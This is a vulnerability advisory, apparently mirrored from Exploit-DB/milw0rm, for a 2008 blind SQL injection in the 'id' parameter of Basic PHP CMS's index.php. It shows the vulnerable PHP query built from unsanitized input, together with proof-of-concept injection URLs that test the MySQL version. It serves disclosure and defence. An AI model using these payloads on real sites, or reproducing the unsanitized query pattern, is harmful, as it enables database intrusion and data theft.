Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability

vendor:

Basic PHP CMS

by:

CWH Underground

7.5

CVSS

HIGH

Blind SQL Injection

CWE

Product Name: Basic PHP CMS

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability

A vulnerability exists in the Basic PHP CMS application due to insufficient sanitization of user-supplied input in the 'id' parameter of the 'index.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database. This can be exploited to manipulate data, disclose sensitive information, and compromise the application and the underlying system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, the application should be configured to use parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

==================================================================
  Basic PHP CMS (index.php id) Blind SQL Injection Vulnerability
==================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 November 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : Basic PHP CMS
 DOWNLOAD    : http://www.content-management-software.us/basiccms.zip
#####################################################

--- Blind SQL Injection ---

-----------------------------
 Vulnerable File (index.php)
-----------------------------

if ($strID != "")
{
	$strsql = "SELECT description ";
	$strsql .=" FROM pages_t_details ";
	$strsql .=" WHERE id=$strID";
	$conclass =new DataBase();
	$rst= $conclass->Execute ($strsql,$strError);
	if ($strError=="")
	{
		while ($line = mysql_fetch_array($rst, MYSQL_ASSOC)) 
	     {
			$strDetails=$line['description'];
		}
	}
	
}

---------
 Exploit
---------

Test Blind SQL Injection in MYSQL Version 5

True
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=5--

False
[+] http://[Target]/[basiccms_path]/index.php?id=1 and substring(@@version,1,1)=4--


#######################################################################################
Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com
#######################################################################################

# milw0rm.com [2008-11-28]